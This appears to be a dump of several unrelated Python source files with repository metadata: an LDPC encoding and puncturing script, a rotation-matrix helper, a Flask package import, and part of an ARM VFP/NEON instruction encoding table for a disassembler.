An additional .transmitted file should be present when \
puncturing is being used.\
For example, when this argument is my.pchk, \
then the program will search for my.pchk.transmitted \
and use it for puncturing if avilable.',
required=True)
parser.add_argument('--gen-file', '-g',
action='store',
dest='gen_file',
type=str,
help='Generator matrix file. Required for encoding.',
required=True)
parser.add_argument('--input-file', '-i',
action='store',
dest='input_file',
type=str,
help='Input file containing one or more message blocks (one per line).',
required=True)
parser.add_argument('--output-file', '-o',
action='store',
dest='output_file',
type=str,
help='Output file to store encoded blocks (one per line). \
An additional output_file.unpunctured is generated when puncturing is used \
and contains all the codeword bits including punctured bits, to enable easy \
extraction of message bits from the codeword.',
required=True)
return parser
def main():
    """Encode message blocks with the LDPC-codes ``encode`` binary and,
    if a ``<pchk-file>.transmitted`` file exists, puncture the codewords.

    When puncturing is applied, only the bit positions listed in the
    .transmitted file are kept in the output file; the complete
    (unpunctured) codewords are preserved in ``<output-file>.unpunctured``.
    """
    parser = get_parser()
    args = parser.parse_args()

    pchk_file = args.pchk_file
    # puncturing metadata is expected next to the parity check file
    transmitted_bits_file = pchk_file + ".transmitted"
    gen_file = args.gen_file
    src_file = args.input_file
    out_path = args.output_file

    # get path to LDPC library encode binary (sibling LDPC-codes directory)
    ldpc_library_path = os.path.join(os.path.dirname(__file__), os.path.pardir, 'LDPC-codes')
    ldpc_encode_path = os.path.join(ldpc_library_path, 'encode')

    # first perform the encoding
    # NOTE: arguments are passed as a list (shell=False) so that paths
    # containing spaces or shell metacharacters are handled safely, instead
    # of concatenating a command string with shell=True.
    subprocess.run([ldpc_encode_path, pchk_file, gen_file, src_file, out_path])

    if not os.path.exists(transmitted_bits_file):
        print("INFO: No .transmitted file found. Assuming no puncturing.")
    else:
        print("INFO: Performing puncturing.")
        # we need to perform puncturing, i.e., remove the untransmitted bits
        # first load the transmitted bit information
        with open(transmitted_bits_file) as f:
            line1 = f.readline().rstrip('\n')
            num_total_bits = int(line1.split(' ')[-1])  # this is the total bit count line
            line2 = f.readline().rstrip('\n')
            transmitted_bits = [int(i) for i in line2.split(' ')]
        # sort for convenience (kept bits appear in ascending position order)
        transmitted_bits.sort()
        # we will write the punctured codewords to a temporary file first;
        # delete=False because the file is renamed over out_path below
        with tempfile.NamedTemporaryFile(mode='w', delete=False, dir=os.getcwd()) as f:
            tmpfilename = f.name
            with open(out_path) as fin:
                for line in fin:
                    line = line.rstrip('\n')
                    assert len(line) == num_total_bits
                    extracted_transmitted_bits = ''.join([line[i] for i in transmitted_bits])
                    f.write(extracted_transmitted_bits + '\n')
        # keep the full codewords, then move the punctured data into place
        os.replace(out_path, out_path + '.unpunctured')
        os.replace(tmpfilename, out_path)
# Script entry point: parse CLI arguments, encode, and optionally puncture.
if __name__ == '__main__':
    main()
| 41.904255 | 101 | 0.551409 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,512 | 0.383854 |
33a406fd3d5662cdfecad65c9a454e308ebff473 | 274 | py | Python | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | survivethevoid/utils/math_func.py | LMikeH/SurviveTheVoid | e517870d1dca388a54f8f523879c6c8583101a02 | [
"bzip2-1.0.6"
] | null | null | null | import numpy as np
def R(angle):
    """Return the 2x2 counter-clockwise rotation matrix for `angle` degrees."""
    rad = angle * np.pi / 180
    cos_a = np.cos(rad)
    sin_a = np.sin(rad)
    return np.array([[cos_a, -sin_a],
                     [sin_a, cos_a]])
if __name__ == "__main__":
    # quick manual sanity check: rotate the unit y-vector by 180 degrees
    vec = np.array([0, 1])
    rotated = np.dot(R(180), vec)
    print(rotated)
| 24.909091 | 61 | 0.572993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.036496 |
33a43569f2dc889b1051e353b42c5978e08a2be2 | 35 | py | Python | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 13 | 2016-03-24T03:12:05.000Z | 2021-03-15T14:58:36.000Z | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 7 | 2016-03-24T03:20:05.000Z | 2017-07-19T03:06:13.000Z | app/__init__.py | lwalter/flask-angular-starter | 31d5468777d429701c8ae0e790458a980fee6837 | [
"MIT"
] | 4 | 2017-06-22T05:52:08.000Z | 2022-02-25T15:25:57.000Z | from app.factory import create_app
| 17.5 | 34 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33a4eb8004a4d73add7bc089b176207822d20abb | 39,949 | py | Python | darmtbl3.py | TaintTrap/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 104 | 2015-01-01T06:14:40.000Z | 2021-12-11T08:05:03.000Z | darmtbl3.py | z4ziggy/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 5 | 2015-02-09T10:16:50.000Z | 2016-04-07T12:58:10.000Z | darmtbl3.py | z4ziggy/darm | f42b509adabbb3a0fbb87937db33d14c2d213bee | [
"BSD-3-Clause"
] | 18 | 2015-02-09T02:36:19.000Z | 2019-07-19T15:29:20.000Z | from darmtbl2 import Bitsize, Rn, Rm, Rt, Rt2
from darmtbl2 import i, imm3, imm4, imm6, imm8, imm4H, imm4L
from darmtbl2 import P, W, D, N, M, cond
# Bit-field descriptors used by the VFP / Advanced-SIMD encoding tables below.
# Each Bitsize(name, width, description) names a variable instruction field
# and its width in bits; fixed opcode bits appear as integer literals
# directly inside the table entries.
Vd = Bitsize('Vd', 4, 'Vector Destination Register')
Vn = Bitsize('Vn', 4, 'Vector Source Register')
Vm = Bitsize('Vm', 4, 'Second Vector Source Register')
# single-bit flags and modifiers
Q = Bitsize('Q', 1, 'Q')
F = Bitsize('F', 1, 'Floating Point Operation')
T = Bitsize('T', 1, 'lowbit')
B = Bitsize('B', 1, 'B')
L = Bitsize('L', 1, 'shift amount etc')
U = Bitsize('U', 1, 'Unsigned')
E = Bitsize('E', 1, 'Quiet NaN Exception')
# element / operand size selectors
size = Bitsize('size', 2, 'VFP Vector Size')
sz = Bitsize('sz', 1, '1-bit VFP Vector Size')
sf = Bitsize('sf', 1, 'Vector Size')
sx = Bitsize('sx', 1, 'Bit Size')
cmode = Bitsize('cmode', 4, 'SIMD Expand Mode')
# memory access alignment fields
align = Bitsize('align', 2, 'Memory Alignment')
index_align = Bitsize('index_align', 4, 'Memory Index Alignment')
a = Bitsize('a', 1, 'Memory Alignment')
# sub-operation selector fields
op = Bitsize('op', 1, '1-bit Operation')
op2 = Bitsize('op2', 2, '2-bit Operation')
type_ = Bitsize('type', 4, 'Some Type')  # trailing underscore avoids shadowing builtin 'type'
len_ = Bitsize('len', 2, 'Length for Vector Table Lookup')  # avoids shadowing builtin 'len'
opc1 = Bitsize('opc1', 2, 'opc1')
opc2 = Bitsize('opc2', 3, 'opc2')
opc2_2 = Bitsize('opc2', 2, 'opc2')  # 2-bit variant of the opc2 field
# VFP / Advanced-SIMD instruction encodings, ARM (ARMv7) encoding space.
# Each entry is a tuple: (mnemonic/format string, then the instruction bits
# from most-significant to least-significant).  Integer literals are fixed
# opcode bits, parenthesised literals such as (0) are "should-be" bits, and
# Bitsize objects (defined above / imported from darmtbl2) are variable
# fields.  The parallel VFP_Thumb table below encodes the same instructions
# for the Thumb encoding space.
VFP_ARMv7 = [
    ('VABA<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 1, Vm),
    ('VABAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 0, 1, N, 0, M, 0, Vm),
    ('VABD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 1, N, Q, M, 0, Vm),
    ('VABDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 1, 1, 1, N, 0, M, 0, Vm),
    ('VABD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
    ('VABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 0, Q, M, 0, Vm),
    ('VABS<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
    ('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 1, Vm),
    ('VADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
    ('VADD<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
    ('VADD<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
    ('VADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
    ('VADDL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, 0, 0, op, N, 0, M, 0, Vm),
    ('VAND<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('VBIC<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
    ('VBIC<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('V<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op2, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('VCEQ<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
    ('VCEQ<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
    ('VCEQ<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 0, Q, M, 0, Vm),
    ('VCGE<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 1, Vm),
    ('VCGE<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
    ('VCGE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 1, Q, M, 0, Vm),
    ('VCGT<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 1, 1, N, Q, M, 0, Vm),
    ('VCGT<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 0, N, Q, M, 0, Vm),
    ('VCGT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 0, 0, Q, M, 0, Vm),
    ('VCLE<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 0, 1, 1, Q, M, 0, Vm),
    ('VCLS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 0, Q, M, 0, Vm),
    ('VCLT<c>.<dt> <Qd>,<Qm>,#0', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 0, 0, Q, M, 0, Vm),
    ('VCLZ<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 0, 1, Q, M, 0, Vm),
    ('VCMP{E}<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 0, Vd, 1, 0, 1, sz, E, 1, M, 0, Vm),
    ('VCMP{E}<c>.F64 <Dd>,#0.0', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 0, 1, Vd, 1, 0, 1, sz, E, 1, (0), 0, (0), (0), (0), (0)),
    ('VCNT<c>.8 <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 0, Q, M, 0, Vm),
    ('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 1, op2, Q, M, 0, Vm),
    ('VCVT{R}<c>.S32.F64 <Sd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, opc2, Vd, 1, 0, 1, sz, op, 1, M, 0, Vm),
    ('VCVT<c>.<Td>.<Tm> <Qd>,<Qm>,#<fbits>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm6, Vd, 1, 1, 1, op, 0, Q, M, 1, Vm),
    ('VCVT<c>.<Td>.F64 <Dd>,<Dd>,#<fbits>', cond, 1, 1, 1, 0, 1, D, 1, 1, 1, op, 1, U, Vd, 1, 0, 1, sf, sx, 1, i, 0, imm4),
    ('VCVT<c>.F64.F32 <Dd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 1, 1, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
    ('VCVT<c>.F32.F16 <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 1, 1, op, 0, 0, M, 0, Vm),
    ('VCVT<y><c>.F32.F16 <Sd>,<Sm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 1, op, Vd, 1, 0, 1, (0), T, 1, M, 0, Vm),
    ('VDIV<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
    ('VDUP<c>.<size>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, imm4, Vd, 1, 1, 0, 0, 0, Q, M, 0, Vm),
    ('VDUP<c>.<size>', cond, 1, 1, 1, 0, 1, B, Q, 0, Vd, Rt, 1, 0, 1, 1, D, 0, E, 1, (0), (0), (0), (0)),
    ('VEOR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('VEXT<c>.8 <Qd>,<Qn>,<Qm>,#<imm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, 1, 1, Vn, Vd, imm4, N, Q, M, 0, Vm),
    ('VFM<y><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 0, N, Q, M, 1, Vm),
    ('VFM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
    ('VFNM<y><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 1, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
    ('VH<op><c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, op, 0, N, Q, M, 0, Vm),
    # element/structure load instructions (multi-element, single-element,
    # and all-lanes variants for VLD1..VLD4)
    ('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
    ('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 0, index_align, Rm),
    ('VLD1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 0, size, T, a, Rm),
    ('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
    ('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 0, 1, index_align, Rm),
    ('VLD2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 0, 1, size, T, a, Rm),
    ('VLD3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
    ('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 0, index_align, Rm),
    ('VLD3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 0, size, T, a, Rm),
    ('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 0, D, 1, 0, Rn, Vd, type_, size, align, Rm),
    ('VLD4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, size, 1, 1, index_align, Rm),
    ('VLD4<c>.<size> <list>,[<Rn>{ :<align>}]{!}', 1, 1, 1, 1, 0, 1, 0, 0, 1, D, 1, 0, Rn, Vd, 1, 1, 1, 1, size, T, a, Rm),
    ('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 1, imm8),
    ('VLDM{mode}<c> <Rn>{!},<list>', cond, 1, 1, 0, P, U, D, W, 1, Rn, Vd, 1, 0, 1, 0, imm8),
    ('VLDR<c> <Dd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 1, imm8),
    ('VLDR<c> <Sd>,[<Rn>{,#+/-<imm>}]', cond, 1, 1, 0, 1, U, D, 0, 1, Rn, Vd, 1, 0, 1, 0, imm8),
    ('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 1, 1, 0, N, Q, M, op, Vm),
    ('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
    ('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
    ('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
    ('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
    ('V<op><c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
    ('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
    ('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
    ('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
    ('VMOV<c>.F64 <Dd>,#<imm>', cond, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
    ('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
    ('VMOV<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
    ('VMOV<c>.<size> <Dd[x]>,<Rt>', cond, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
    ('VMOV<c>.<dt> <Rt>,<Dn[x]>', cond, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
    ('VMOV<c> <Sn>,<Rt>', cond, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
    ('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
    ('VMOV<c> <Dm>,<Rt>,<Rt2>', cond, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
    ('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
    ('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
    ('VMRS<c> <Rt>,FPSCR', cond, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
    ('VMSR<c> FPSCR,<Rt>', cond, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
    ('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, op, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
    ('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
    ('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
    ('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
    ('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, Q, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
    ('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, U, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
    ('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
    ('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
    ('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
    ('VNEG<c>.F64 <Dd>,<Dm>', cond, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
    ('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', cond, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
    # NOTE(review): the 'UInt(Vd:D);' format string below looks like pasted
    # pseudocode rather than a mnemonic -- verify against the generator.
    ('UInt(Vd:D);', cond, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
    ('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, 1, 0, 0, 1, i, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
    ('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
    ('VPADAL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
    ('VPADD<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
    ('VPADD<c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
    ('VPADDL<c>.<dt>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
    ('VP<op><c>.<dt>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
    ('VP<op><c>.F32', 1, 1, 1, 1, 0, 0, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
    ('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
    ('VPOP <list>', cond, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
    ('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
    ('VPUSH<c> <list>', cond, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
    ('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
    ('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, U, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
    ('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
    ('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 1, 0, 0, 1, 0, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
    ('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 0, 0, 1, 0, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
